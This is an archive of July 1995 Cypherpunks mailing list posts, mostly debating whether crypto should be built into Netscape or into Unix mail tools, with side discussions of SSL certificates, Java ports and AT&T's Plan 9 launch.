>restriction that vendors may or may not try to enforce ("can Netscape be
>extended or not" becomes moot).

So go ahead and do it! I've been waiting for many years for such things.

To state an obvious non-crypto use of such "modules," why do all major word
processing and page layout apps have their own "dictionaries"? Why do I
have to train the dictionaries of Word, Nisus, FrameMaker, MORE, etc.? That
there have not been "dictionary modules," for many and sundry reasons, is
telling. (Before anyone mentions it, one can on the Mac use things like
"Thunder" instead of the local dictionaries...this is not the same as a
module usable by all programs, but instead is a user choice to bypass the
local dictionaries. We could quibble for hours about whether this is in
fact a universal module or not.)

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Thu, 20 Jul 95 09:13:30 PDT
To: dave@dvorak.jta.edd.ca.gov
Subject: Re: Netscape the Big Win
In-Reply-To: <199507201449.HAA02245@dvorak.jta.edd.ca.gov>
Message-ID: <doug-9506201613.AA002518293@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain




>on Wed, 19 Jul 1995 20:24:31 -0800  Douglas Barnes wrote:
>> available on Suns running Solaris 2.4 and PCs running Windows NT.
>               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>Are there any plans to port JAVA to a REAL operating system?  Support
>for crypto needs to be ubiquitous to work.  Start with the fanatics
>(Linux and FreeBSD) and the other platforms will quickly follow (often
>ported by the aforementioned fanatics so that the departmental server
>can run the same code as their desktop box :-).
>
>                Dave Otto - Vinimus, Vedimus, Dolivamus
>    http://ACM.org/~daveotto/   http://ACM.org/~daveotto/linux.html/
>              dave@dvorak.jta.edd.ca.gov daveotto@acm.org
>  "Pay no attention to the man behind the curtain!"     [the Great Oz]
>     finger DaveOtto@ACM.org/or server for PGP 2.6 key  <0x3300e841>
>
>
>
There are java ports in progress for several OS's. Linux is among them
and there is a special mailing list for the linux port of java. Check the
sun home page for porting information, mailing lists, and new developments.

By the way, the current version of Java is Alpha2 release. Expect interface
and programmatic changes before a real version comes out January time frame.

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		"Real programmers use cat > file.as"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 20 Jul 95 08:17:22 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <9507201516.AA23453@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> I'm not sure what this is getting at.  SSL does use a separate RC4 stream
> for each comm half.  Is this a suggestion that a single key should be
> used for both directions?

No.  They were saying "look, we use two keys."  And Perry went "duh."
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Thu, 20 Jul 95 08:18:57 PDT
To: cypherpunks@toad.com
Subject: RE: Netscape the Big Win
Message-ID: <40697.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  tcmay@sensemedia.net (Timothy C. May)  writes:

> * I use Netscape to read News.
> * I use Netscape to access the Web.
> * I still use Eudora to send and receive Mail. (Netscape can currently
> send mail, but not receive it. This is likely to change soon.)

I'm not about to argue that the web isn't the hottest thing on the net,
which is the hottest thing in computing... But I've got a question
that I can't resolve.

The current trend is to bundle all types of functionality into huge
monolithic programs. Add mail to netscape, add encryption, add ...

Yet most of the computers people use are multi-windows, and soon most
will even be multi-tasking.

Why are all-in-one programs so preferable to using the windowing
capabilities that are built into every X-window, Mac or Windows system?

Why not use the best mail client, another best webcrawler, and yet another
news reader?

Microsoft has been preaching the use of OLE and component programs as its
development vision for 2+ years, Macs have been popular for ten years,
why is the trend still towards adding every possible bell and whistle
to single programs?

With components, it wouldn't be hard to have a universal
Encryption/Signature module. It would get around any proprietary
restriction that vendors may or may not try to enforce ("can Netscape be
extended or not" becomes moot).

Is clicking on another icon really too hard?

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 20 Jul 95 08:30:51 PDT
To: cypherpunks@toad.com
Subject: P.S. re: IITF Report
Message-ID: <9507201521.AA11198@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


I am told by my local net expert that it should have been:

	http://ntiaunix1.ntia.doc.gov:70/iitf/security/fedrole.txt

(but the URL I sent before worked for me).

The report is dated June 14 -- but I don't remember seeing any discussion
of it on the list.  IMHO, it's very good -- gives passing mention of
Clipper but doesn't push GAK.

 - Carl

 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +----------------------------------------------------------- Jean Ellison -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Champeon - Imonics Development <schampeo@imonics.com>
Date: Thu, 20 Jul 95 08:23:11 PDT
To: hfinney@shell.portal.com
Subject: Re: Netscape the Big Win
Message-ID: <9507201522.AA14900@fugazi.imonics.com>
MIME-Version: 1.0
Content-Type: text/plain


|   From: Hal <hfinney@shell.portal.com>
|   Subject: Re: Netscape the Big Win
|
|   [ much complaining by .pm deleted ]
|   
|   Note though that neither SSL nor SHTTP requires that the certificates come
|   from RSA.  However the current versions of Netscape's browser do require this.
|   This has been the source of much complaint and Netscape has promised that
|   they will have some mechanism in the future to allow the user to
|   choose his certificate signers.  I am not sure how far RSA will let them
|   off the leash, though.

I do know that at the Netscape Spring Training I attended, that was the
source of much consternation from the techies (who knew what it meant)
and Mr. Elgamal was certainly aware of it. The thing that scared me was
that most of the sales and marketing folks took the approach that I think
we can expect from them: "What! That's ridiculous! Oh, it's only $230?
Oh, okay. That's cheap enough." and then they went on their happy way.

The one "advantage" to SSL that they were pushing over SHTTP was that
SSL is a socket-level encryption mechanism, as opposed to protocol-
level. It doesn't conflict with SHTTP except in terms of adding to
the processing time.

I guess I don't see why SSL is so awful from a crypto standpoint.
Could someone a bit more educated on the nuts and bolts clue me
in on its weaknesses? As compared to other schemes, perhaps?

Thanks in advance,

Steve Champeon
Technical Lead, Web Services
Imonics Corporation 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Thu, 20 Jul 95 09:35:19 PDT
To: cypherpunks@toad.com
Subject: Plan 9 OS  (NewsClip)
Message-ID: <199507201635.LAA24498@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain




AT&T Launches Plan 9 Operating System


Murray Hill, NJ, July 19 -- AT&T has announced a new
distributed operating system, called Plan 9. The new system
was developed by some of the same people who created the Unix
operating system, and the terms on which AT&T is making it
available are reminiscent of Unix, but the company stressed
that Plan 9 is not Unix.

Named for the cult science fiction movie Plan 9 From Outer
Space, the Plan 9 operating system is designed to work well on
networked computers. It has components for "terminals," or
desktop systems, for file servers, and for central processing
unit (CPU) servers.

Plan 9 is designed to deal with multiprocessing systems as CPU
servers. It supports four major hardware architectures: Intel
Corp.'s x86 line (including the Pentium chip), MIPS Computer
Systems Inc. processors, Sun Microsystems Inc. SPARC chips,
and Motorola Inc.'s 68020 and 68040 processors.

During simultaneous press conferences in Murray Hill and San
Francisco, connected by a teleconference link, Rob Pike, one
of the Plan 9 developers, said the new system is meant to
combine some of the advantages of Unix with some of those of
low-cost hardware. "We basically started by noticing some
things that we liked and didn't like about Unix and liked and
didn't like about workstations," Pike said.

Pike stressed that while Plan 9 borrows some ideas from Unix,
it is quite different and is not compatible with Unix. He went
on to say that AT&T does not expect Plan 9 to compete with
major commercial operating systems such as Unix and Microsoft
Corp.'s Windows NT. "This is not the next Unix," Pike said.

It appears in fact that the most promising commercial market
for Plan 9 might be in embedded systems. During the press
conference, AT&T researchers and officials repeatedly
mentioned the possibility that Plan 9 might be built into
consumer devices and other intelligent electronic devices, an
area where no standard operating system predominates today.

AT&T plans to make Plan 9 available for commercial licensing
to other vendors for an initial fee of $200,000, plus per-copy
fees that will amount to 20 percent of the resale price of
commercial software or two percent of the selling price of
hardware with Plan 9 built in, said Paul Fillinich, marketing
manager for AT&T's Software Solutions operation.

Single copies of Plan 9 will also be available for research
and educational use, but Fillinich stressed that the company
will not provide technical support. "We will replace the media
should it fail," he said. For commercial licensees there may
be some sort of support in the future. "We are contemplating
this," Fillinich said. "However, we haven't decided what the
offering will be."

Publisher Harcourt Brace & Co. will distribute Plan 9 for
AT&T. The full package, including a CD-ROM, four diskettes,
and two manuals, will cost $350. The manuals are available on
their own for $125.

Apparently wishing to avoid a repeat of the way Unix
splintered into many different versions, AT&T is specifying
that while source code for Plan 9 will be made available to
research and educational users, any changes they make will
become AT&T's property so that they can be incorporated in the
base code. "We want only one Plan 9," Fillinich said. "We
think the industry wants only one Plan 9."

The minimum hardware needed to run Plan 9 is an Intel 386
processor with eight megabytes (MB) of memory and 40MB of
available hard disk space, said Phil Winterbottom, another of
the Plan 9 developers. An optimal arrangement would include a
dedicated file server and multiple desktop terminals, he
added.

Further information about Plan 9 is available on AT&T's
Plan 9 home page on the World Wide Web, at
http://plan9.att.com/plan9/index.html.

--







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 20 Jul 95 08:56:27 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Netscape the Big Win
In-Reply-To: <199507201453.HAA19510@jobe.shell.portal.com>
Message-ID: <199507201556.LAA15191@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:
| >Among other things, SSL only lets you authenticate to X.509
| >certificate roots that have been issued straight from the hands of Jim

| Unfortunately the main alternative to SSL being pushed now, SHTTP, also
| suffers from RSA-itis.  It will support either PEM or PKCS-7 key
| certificates, so I think ends up being pretty much the same as SSL in
| this regard.

	Actually, it also supports Kerberos (not relevant to most of
us), and PGP messaging.  Although a KCA would be needed before anything
useful came of the PGP support, at least it's there.

	However, right now, there are few real alternatives to RSA
based schemes.  Has anyone looked deeply at SLED's procedures for key
authentication?

Adam



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Calligaro <mikecal@microsoft.com>
Date: Thu, 20 Jul 95 12:09:40 PDT
To: cypherpunks@toad.com
Subject: Re: cypherpunk "Zen" victories
Message-ID: <9507201945.AA24257@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


<Though I'm not on the list, I read Cypherpunks through the extreme 
filter of a friend who forwards all the good stuff to me.>

Vladimir's post was very good.  I only take issue with the last bit.

<<So the next time that you rant about how some bill or another
means the Death of the Net, or the police investigating a remailer
means the downfall of cryptoanarchy, or a lousy article with a
zillion distortions comes out, think again. The greatest cypherpunk
victories are emerging through what would appear at first to be the
"blackest" moments.>>

So long as you remember that when these things come out we still need 
to scream and yell about them.  The Rimm Job is not a victory simply 
because Rimm was crazy.  It's a victory because many people took the 
time to criticize it and many others took the time to inform the masses 
of that criticism.

These attacks may go in our favor, so long as we direct them in the 
right direction.  There's something Zen in that as well.  Don't punch 
your charging opponent.  Instead misdirect hir energy a bit and let hir 
run into that wall behind you...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 20 Jul 95 09:13:06 PDT
To: perry@imsi.com
Subject: Re: Netscape the Big Win
In-Reply-To: <9507200747.AA15208@snark.imsi.com>
Message-ID: <199507201612.MAA11998@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



Perry writes: 
> > The relevance for Cypherpunks interested in writing code is that, in my
> > carefully considered opinion, writing for Netscape and other Web browsers
> > is the Big Win. Even over Windows (except Windows browsers, of course).
> 
> Netscape is a closed system. You can't write code for it unless you
> work for Netscape.
> 
> Perry

  I concur with everything you said Perry. However, it may be possible to
write code "for netscape". If their NSAPI (control the browser remotely
via message/event passing) allows full control, you could probably hook
into the crypto functions. If not, you could always generate forms and
html pages on the fly with the data you want to send, and force the
browser to submit them. If the other end has an SHTTP/SSL enabled server,
it will be sent encrypted. It's a yucky solution. If Netscape incorporates
*full* hotjava capability (like defining new protocol handlers such as
SECURE://), then that would be much better. I have some doubts that Netscape
will implement all the Hotjava functionality when they incorporate Java 
because it would allow people to change the look-and-feel (and functionality)
of the browser too much, and also because they would have to softcode
(in java), a lot of the functionality they have hardcoded right now.

  Browsers are beginning to become like emacs. Virtual operating systems
unto themselves.


-Ray






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 20 Jul 95 09:32:10 PDT
To: pfarrell@netcom.com
Subject: Re: Netscape the Big Win
In-Reply-To: <40697.pfarrell@netcom.com>
Message-ID: <199507201631.MAA18946@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> The current trend is to bundle all types of functionality into huge
> monolithic programs. Add mail to netscape, add encryption, add ...
> 
> Yet most of the computers people use are multi-windows, and soon most
> will even be multi-tasking.
> 
> Why are all-in-one programs so preferable to using the windowing

[why favor the browser approach of sticking all the client functionality
for various protocols into one program]

   The answer is: integration. While TRN is a great newsreader, and 
Eudora's a great mail reader, etc, if I read a post in TRN or a message
in Eudora, there is no hyperlinking. If I see a link or reference,
I have to cut-n-paste it into an ftp session or a web browser.
If "helper applications" for web browsers could talk bidirectionally
with the browser in a meaningful way (display output in the window for
example, and use the browser to open and fetch data), there would be
no need for all this. Isn't it much better to have inline jpeg viewing
in a page rather than launching 10 jpeg viewers externally?

   Since not all operating systems have a standard cross-platform technique
of interapplication communication, it makes porting these helper apps and
browsers all the more difficult.

   The future is in component systems like OpenDoc and HotJava. With HotJava,
you can once again return to "shopping around for the best mail reader
application", however this time, it will be a program you can run from within
the browser. Not only that, but you can automagically download it just by
going to a home page, or placing the mail reader application in your own
homepage.

  It used to be that each media type was stored in a different document,
and a special tool had to be used on each file. Now, all media types
can coexist in the same document, and the "handlers" for each media type
are packaged into the document too (or, links on where to find them)

  I wouldn't be surprised if in 5-10 years, your operating system basically
looks like a cross between Netscape, OpenDoc, and HotJava. The "browser"
would be ubiquitous, and local/LAN/WAN data would be treated transparently.


-Ray





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 20 Jul 95 09:36:52 PDT
To: dave@dvorak.jta.edd.ca.gov (Dave Otto)
Subject: Re: Netscape the Big Win
In-Reply-To: <199507201449.HAA02245@dvorak.jta.edd.ca.gov>
Message-ID: <199507201636.MAA20551@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> on Wed, 19 Jul 1995 20:24:31 -0800  Douglas Barnes wrote:
> > available on Suns running Solaris 2.4 and PCs running Windows NT.
>                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> Are there any plans to port JAVA to a REAL operating system?  Support
> for crypto needs to be ubiquitous to work.  Start with the fanatics
> (Linux and FreeBSD) and the other platforms will quickly follow (often
> ported by the aforementioned fanatics so that the departmental server
> can run the same code as their desktop box :-).

  Go to http://java.sun.com and join the java porting list and also the
linux porting list. Suffice it to say, it is being worked on by many people.
The next port coming out will be for the Mac. Linux will probably be right
after that. The problem with porting HotJava (and Java) is that it uses
Solaris Threads, and if your operating system doesn't have a lightweight
process/thread library, you have to port one, or write your own. Secondly,
HotJava uses OpenWindows, and third, it relies on some Solaris specific
memory mapping tricks. (I've heard, there's also some endian problems)

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 20 Jul 95 12:32:25 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <ac33f977080210043230@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:25 PM 7/20/95, Patrick J. LoPresti wrote:
>>>>>> "tcmay" == Timothy C May <tcmay@sensemedia.net> writes:
>
> tcmay> Integration of crypto into Netscape is thus the Big Win.
>
> tcmay> I felt this was the case as far back as last fall, but my
> tcmay> recent experiences tell me this is more important than
> tcmay> ever. Integration of PGP and other crypto routines into Tin,
> tcmay> Pine, Elm, Joe, Emacs, etc., is just not as important.
>
>Careful here.  Deliberately or not, you are marginalizing the hard
>work of dozens of people, including me.  You are suggesting our work
>should have been done for Netscape instead, a program that a) is not
>free software (FSF sense); b) has no mail reader; and c) has no
>extension language.  Oh, and d) is horrendous as a news reader.

No offense, but "marginalizing" is what I love to do more than anything!

Seriously, the world is what the world is. I really don't care about "FSF"
one way or the other, and will join the rest of the world (apparently) in
using Netscape. And yes, I am "marginalizing" the work that anyone does on
"fringe" projects like Linux, which will likely always remain in the ghetto
of Unix hackers who want a cheap Unix running on their cheap 486 boxes...it
just ain't gonna take over inside corporations or amongst the many folks
like me.

Frankly, one of the great boons of my current setup is that I can
completely get away from Unix tools and commands, away from my Unix shell
account at Netcom, away from the arcane commands that vary from program to
program, away from tin and elm and emacs...my fingers are already
forgetting the emacs commands!

(Those of you who like Unix, fine. I agree it is useful for many things, so I'm
not trying to debate Unix vs. the world. Just giving my perspective, and
apparently the perspective of the many who are adopting the Web browsers as
their "operating environments," insulated from the underlying cruft.)

(If the GNU folks were to do an "open, extensible, Netscape workalike," this
could be a win. Some may claim that Mosaic is/was that. We can debate this
in a separate thread.)

I acknowledge that it has no mail reader, which is why I'm still using
Eudora. But as soon as it does....

And the newsreader is a matter of taste...it does all I want it to do, and
I'm a fairly heavy reader of News and contributor to Usenet groups. I
survived with "tin" for several years, so anything is possible.

>The packages that you implicitly denigrate provide far and away the
>best interfaces to PGP available today.  They are written with the
>tools available, whether it's a Windows shell, a hacked version of
>Elm, or an Emacs Lisp package.

I don't think the packages I "denigrate" are the key to the future
widespread use of crypto. Look at the actual usage patterns.


>Netscape is not a platform.  It is a browser.  It is only useful for
>viewing content that others have created, with a user interface that
>any idiot can use.  Consequently, yes, it is very popular with the
>masses and will become more so.

This makes my point. We may dismiss the masses as not being true Unix gurus
or as being ignorant of Emacs, but this is how crypto will become truly
ubiquitous. Not when people have to learn to compile code and create
clients, but when they can send encrypted messages easily and
transparently.

That Qualcomm (Eudora), Netscape, Frontier, Microsoft, Lotus, and others
are working on an interoperable "Secure/MIME" should be encouraging.


>end, but for which none has been written?  If it is ever feasible to
>do what you suggest, someone will do it; your musings will have no
>effect on that.  If you want to make a difference, try writing some
>code yourself...

Please, your insulting tone ("your musings," "try writing some code..") is
uncalled for. You have your views, I have mine.

From the large number of messages in this thread, apparently my points
struck a chord. Like it or not, huge numbers of users are using Netscape
and similar browsers. This is the basic reality. This is where the bulk of
crypto users are going to be, not compiling ftp-gotten PGP into their Emacs
configurations.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 20 Jul 95 13:02:10 PDT
To: Ray Cromwell <pfarrell@netcom.com
Subject: Re: Netscape the Big Win
Message-ID: <ac3402ec0a0210046af5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:31 PM 7/20/95, Ray Cromwell wrote:

>  I wouldn't be surprised if in 5-10 years, your operating system basically
>looks like a cross between Netscape, OpenDoc, and HotJava. The "browser"
>would be ubiquitous, and local/LAN/WAN data would be treated transparently.
>

This is precisely my view, although I try to call it an "operating
environment," so as to get away from quibbling about what is and what is
not a real OS.

There were reasons why some folks like to do as much work as they could in
an integrated environment like Emacs, regardless of the underlying OS
flavor. Many folk still do, and they read News, send mail, etc., all from
within Emacs.

Same idea with Netscape...albeit with a different focus. And my guess,
based on lots of indications, is that about a thousand times as many people
will soon be doing this with Netscape as with Emacs, or elm, or pine, etc.

Ray's comments about OpenDoc, HotJava, and other object-oriented tools fit
this picture, I think.

I am sorry that some folks heavily committed to the Linux route, or to
Emacs, or to GNU/FSF, or to other approaches feel that their work is
technically superior and deserves to be as popular as Netscape and similar
approaches, but reality is reality.

(And I could be wrong on the way things will unfold. All I'm saying is that
technology is a moving target, that plans have to change, and that ease of
use will likely win out over technical sophistication. Folks who think the
stronger technology will inevitably win should pick up a copy of a
15-year-old book called "The Soul of a New Machine," by Tracy Kidder.)

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@skyclad.lcs.mit.edu>
Date: Thu, 20 Jul 95 10:25:44 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <199507201725.NAA22141@skyclad.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "tcmay" == Timothy C May <tcmay@sensemedia.net> writes:

 tcmay> Integration of crypto into Netscape is thus the Big Win.

 tcmay> I felt this was the case as far back as last fall, but my
 tcmay> recent experiences tell me this is more important than
 tcmay> ever. Integration of PGP and other crypto routines into Tin,
 tcmay> Pine, Elm, Joe, Emacs, etc., is just not as important.

Careful here.  Deliberately or not, you are marginalizing the hard
work of dozens of people, including me.  You are suggesting our work
should have been done for Netscape instead, a program that a) is not
free software (FSF sense); b) has no mail reader; and c) has no
extension language.  Oh, and d) is horrendous as a news reader.

The packages that you implicitly denigrate provide far and away the
best interfaces to PGP available today.  They are written with the
tools available, whether it's a Windows shell, a hacked version of
Elm, or an Emacs Lisp package.

Maybe Netscape will include a mail reader someday.  Maybe Netscape
will include Java as an extension language someday.  But until that
day, the only people who can put crypto into Netscape are the folks at
Netscape Communications.

 tcmay> IBM just paid nearly $3 billion for Lotus, largely for the
 tcmay> "common platform" of Lotus Notes. I believe Netscape is an
 tcmay> even more important common platform, and will displace Notes.

Netscape is not a platform.  It is a browser.  It is only useful for
viewing content that others have created, with a user interface that
any idiot can use.  Consequently, yes, it is very popular with the
masses and will become more so.

 tcmay> The relevance for Cypherpunks interested in writing code is
 tcmay> that, in my carefully considered opinion, writing for Netscape
 tcmay> and other Web browsers is the Big Win. Even over Windows
 tcmay> (except Windows browsers, of course).

Can you name a platform for which it is possible to write a PGP front
end, but for which none has been written?  If it is ever feasible to
do what you suggest, someone will do it; your musings will have no
effect on that.  If you want to make a difference, try writing some
code yourself...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3beta, an Emacs/PGP interface

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 20 Jul 95 13:28:09 PDT
To: cypherpunks@toad.com
Subject: "Cypherpunks Write Code" as a Putdown
Message-ID: <ac3406e80c0210045a87@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:25 PM 7/20/95, Patrick J. LoPresti wrote:

>                            If it is ever feasible to
>do what you suggest, someone will do it; your musings will have no
>effect on that.  If you want to make a difference, try writing some
>code yourself...

I want to comment on this latest version of the "Cypherpunks write code"
universal putdown.

It's become common in debates on what is possible, what is likely, and
what should be done for someone to "trump" the argument with the mantra of
"Cypherpunks write code."

In my posting on why I think Netscape and related operating environments
represent the likeliest targets for widespread crypto use (the "big win" I
used in my title), I did not whine that others ought to write code for me.
I said that this is where users were going in massive numbers.

Take it or leave it, as an analysis, but the "try writing some code" is a
meaningless insult.

The world is made up of bridge designers, legal experts, authors, chip
designers, and on and on. Not just programmers.

The line "Cypherpunks write code"--which is sometimes treated here with a
reverence its origins do not support--was a reference to our view that
technology, meaning actual deployment, was more important and interesting
than yet more gabbing about liberty and privacy.

And what is "writing code"? Is it only Perl and C? Or does defining what a
remailer needs to do count as writing code? (Attendees at the first
Cypherpunks meeting, almost 3 years ago, can confirm that I was the one who
spent about two hours describing Chaum's mix work, and running the
"remailer experiment"...we debated how a remailer could actually work, and
Eric Hughes took on the task of writing the first one.)

The "BlackNet" experiment I ran actually worked...the keys worked, the
mechanisms worked, and the experiment has been used by many as an actual
concrete illustration of how untraceable information markets will develop.
An actual demonstration is worth more than mere speculation, and this was
an actual demonstration. I call this "writing code," albeit not C code.

(My actual code writing, in real computer languages, is oriented toward
Mathematica, on my Mac, and Smalltalk Agents. Not all programming is
oriented toward writing Unix tools, and I think the narrow interpretation
of "Cypherpunks write code" to mean this is misleading.)

In any case, even the ur-crypto hacker Zimmermann is writing very little
actual code in PGP these days...does this mean he should "try writing some
code" instead of doing what he apparently does best?

In short, the insulting tone of many Cypherpunks these days is saddening.

I plan to continue to speak my mind, to point out what I think are the more
important routes to a desirable future, and to criticize what I think are
dead ends and ghettoized approaches.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 20 Jul 95 13:46:24 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: RANT GENERATORS
In-Reply-To: <9507202028.AA05535@snark.imsi.com>
Message-ID: <Pine.SUN.3.91.950720133756.23898B-100000@crl4.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Geez Louise, what is going on with all this blah, blah about 
fooling our elected representatives (hah) with electronic form 
letters?

If the proponents of this ill-conceived idea had spent half as 
much time actually writing to their congress-entities as they put 
into this silly debate . . .


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 20 Jul 95 13:43:57 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: Netscape the Big Win
Message-ID: <ac340c990d021004b0d4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:23 PM 7/20/95, Jon Lasser wrote:

>And from what I've heard about HotJava (not seen it yet, can't comment
>strongly) there needs another jump in PC power before it would be useful
>at the home level.  Part of why we were stuck with DOS for so long is
>that it was what got the job done when the revolution happened.  For that
>reason, I agree that HTML/Integrated browser solutions are what we're
>looking at, and at the same time don't have strong hopes for HotJava,
>though I would like to see it succeed.

Just to clarify, you mentioned "useful at the home level." I can't speak
for Ray, but I certainly didn't mean HotJava (or PowerObjects, or OpenDoc,
or Agents tools, etc.) would be used at "the home level."

Such tools would likely be used at the programming level.

As to HotJava itself, who knows? It's one of several tools coming along.

The key is that folks--millions of them at last count--are voting with
their feet that they want the ball of wax that is "The Web" (Netscape or
Mosaic, HTML, HTTP, browsers, automated handling of images and sounds,
integrated Newsreaders and mailers, etc.).

They, the millions of users, demonstrably don't want to mess with Linux, or
FreeBSD, or PGPelm, or even simple, straight text PGP (that is, PGP not
integrated with mailers, just standalone). They want ease-of-use and a
semantically simple model of how things work. (This is why I liked Lisp
Machines when I programmed them for Intel, and why I was an early adopter
of the Macintosh, and why Windows has been doing so well...and why Netscape
is doing spectacularly well.)

This is not an "OS War" I'm taking sides in, just simple truth about what
people are buying, using, clamoring for. It's important to our longer-range
goals to recognize these important trends, like them or not.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick J. LoPresti" <patl@skyclad.lcs.mit.edu>
Date: Thu, 20 Jul 95 11:02:41 PDT
To: cypherpunks@toad.com
Subject: RE: Netscape the Big Win
Message-ID: <199507201802.OAA22155@skyclad.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "pfarrell" == Pat Farrell <pfarrell@netcom.com> writes:

 pfarrell> Why are all-in-one programs so preferable to using the
 pfarrell> windowing capabilities that are built into every X-window,
 pfarrell> Mac or Windows system?

 pfarrell> Why not use the best mail client, another best webcrawler,
 pfarrell> and yet another news reader?

